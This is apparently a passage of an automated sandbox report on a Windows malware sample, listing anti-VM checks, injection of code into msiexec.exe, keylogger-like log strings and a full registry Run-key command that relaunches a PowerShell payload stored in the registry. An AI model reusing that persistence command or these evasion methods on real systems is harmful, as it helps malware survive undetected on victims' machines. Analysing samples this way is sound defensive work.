              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEBS5M
              Source: powershell.exe, 00000002.00000002.274407978909.0000000006F50000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.274408791125.000000000742D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274581380265.00000000082D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9927Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 460Thread sleep count: 2100 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 2100 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeFile Volume queried: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeFile Volume queried: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\determinationens\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\Jump to behavior
              Source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exebs5m
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.00000000069C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
              Source: powershell.exe, 00000002.00000002.274407978909.0000000006F50000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.274408791125.000000000742D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274581380265.00000000082D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
              Source: powershell.exe, 00000002.00000002.274518512027.000000000CEE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeAPI call chain: ExitProcess graph end nodegraph_0-3500
              Source: C:\Users\user\Desktop\zR4aIjCuRs.exeAPI call chain: ExitProcess graph end nodegraph_0-3504
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03057711 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,2_2_03057711
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2CF0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2CBFF30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)"Jump to behavior
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHY\odu
              Source: msiexec.exe, 00000006.00000002.274580776368.00000000069E7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, logs.dat.6.drBinary or memory string: [2024/10/06 05:47:10 Program Manager]
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerArthur
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHY\ot=Fw
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHY\
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:0s\ArtAw
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:0\
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHY\3
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:1\C:\
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1:1onsolOw
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHY\16w
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHY\;wo
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUSERPRO
              Source: msiexec.exe, 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerZ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
